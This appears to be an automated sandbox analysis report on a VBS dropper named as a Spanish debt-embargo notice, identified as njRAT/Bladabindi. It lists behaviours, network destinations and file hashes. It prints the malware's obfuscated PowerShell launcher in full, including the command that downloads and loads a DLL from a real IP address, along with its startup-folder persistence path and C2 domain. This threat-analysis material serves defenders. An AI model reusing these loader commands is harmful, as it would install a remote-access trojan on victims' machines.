Analysis Overview
SHA256
49bb9b1be17a3b590a8cb4245e1a3f07fb13648676ff7e0240f3030678c503d6
Threat Level: Known bad
The file Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendientes de pago correspondientes SE DECLARAN EMBARGADOS.vbs was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-11 14:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-11 14:55
Reported
2022-08-11 14:57
Platform
win7-20220715-en
Max time kernel
45s
Max time network
49s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1940 wrote to memory of 240 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1940 wrote to memory of 240 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1940 wrote to memory of 240 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 240 wrote to memory of 2044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 240 wrote to memory of 2044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 240 wrote to memory of 2044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACYAJQAkAD⌚⌚⌚AdABCAFQARABZACgAKQBSADAAJQAkACMAIgBIAEYASgBmAGIAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '&%$5tBTDY()R0%$#"HFJfb' ))"
Network
| Country | Destination | Domain | Proto |
| RU | 91.241.19.49:80 | 91.241.19.49 | tcp |
Files
memory/1940-54-0x000007FEFC441000-0x000007FEFC443000-memory.dmp
memory/240-55-0x0000000000000000-mapping.dmp
memory/240-57-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
memory/240-59-0x00000000026E4000-0x00000000026E7000-memory.dmp
memory/240-58-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
memory/2044-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | f007338b947c62892340662049c231df |
| SHA1 | 93bb79455ff72b60c1e90c842c5d1df7c197d9d6 |
| SHA256 | 96f4a8433a83acc63123737e9c5b3f8c7ab50bc25ad1e9b6a44987a922e946a4 |
| SHA512 | 2ac8c1ac97fdbf1ad621e69da75535521e8af805acf55af29db733831fd44c3c845db28390429ece6e58607f676aa99b19fb5c4c3975303734c4aa9322343376 |
memory/240-63-0x00000000026EB000-0x000000000270A000-memory.dmp
memory/2044-64-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
memory/2044-65-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
memory/2044-66-0x00000000028E4000-0x00000000028E7000-memory.dmp
memory/2044-67-0x00000000028EB000-0x000000000290A000-memory.dmp
memory/2044-68-0x00000000028E4000-0x00000000028E7000-memory.dmp
memory/2044-69-0x00000000028EB000-0x000000000290A000-memory.dmp
memory/240-70-0x00000000026E4000-0x00000000026E7000-memory.dmp
memory/240-71-0x00000000026EB000-0x000000000270A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-11 14:55
Reported
2022-08-11 14:57
Platform
win10v2004-20220721-en
Max time kernel
146s
Max time network
144s
Command Line
Signatures
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&%$5tBTDY()R0%$#HFJfb.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&%$5tBTDY()R0%$#HFJfb.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4724 set thread context of 4416 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACYAJQAkAD⌚⌚⌚AdABCAFQARABZACgAKQBSADAAJQAkACMAIgBIAEYASgBmAGIAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '&%$5tBTDY()R0%$#"HFJfb' ))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 91.241.19.49:80 | 91.241.19.49 | tcp |
| US | 8.8.8.8:53 | wibnj.duckdns.org | udp |
| CO | 179.14.8.103:57831 | wibnj.duckdns.org | tcp |
| US | 209.197.3.8:80 | tcp | |
| CO | 179.14.8.103:57831 | wibnj.duckdns.org | tcp |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| FR | 2.18.109.224:443 | tcp |
Files
memory/956-130-0x0000000000000000-mapping.dmp
memory/956-131-0x000001B9B0C10000-0x000001B9B0C32000-memory.dmp
memory/4724-132-0x0000000000000000-mapping.dmp
memory/956-133-0x00007FF813180000-0x00007FF813C41000-memory.dmp
memory/4724-134-0x00007FF813180000-0x00007FF813C41000-memory.dmp
memory/4416-135-0x0000000000400000-0x000000000040C000-memory.dmp
memory/4416-136-0x000000000040675E-mapping.dmp
memory/4724-137-0x00007FF813180000-0x00007FF813C41000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
memory/956-140-0x00007FF813180000-0x00007FF813C41000-memory.dmp
memory/4416-141-0x00000000058B0000-0x000000000594C000-memory.dmp
memory/4416-142-0x0000000005F40000-0x00000000064E4000-memory.dmp
memory/4416-143-0x0000000005A70000-0x0000000005B02000-memory.dmp
memory/4416-144-0x00000000059F0000-0x00000000059FA000-memory.dmp
memory/4416-145-0x0000000005B10000-0x0000000005B76000-memory.dmp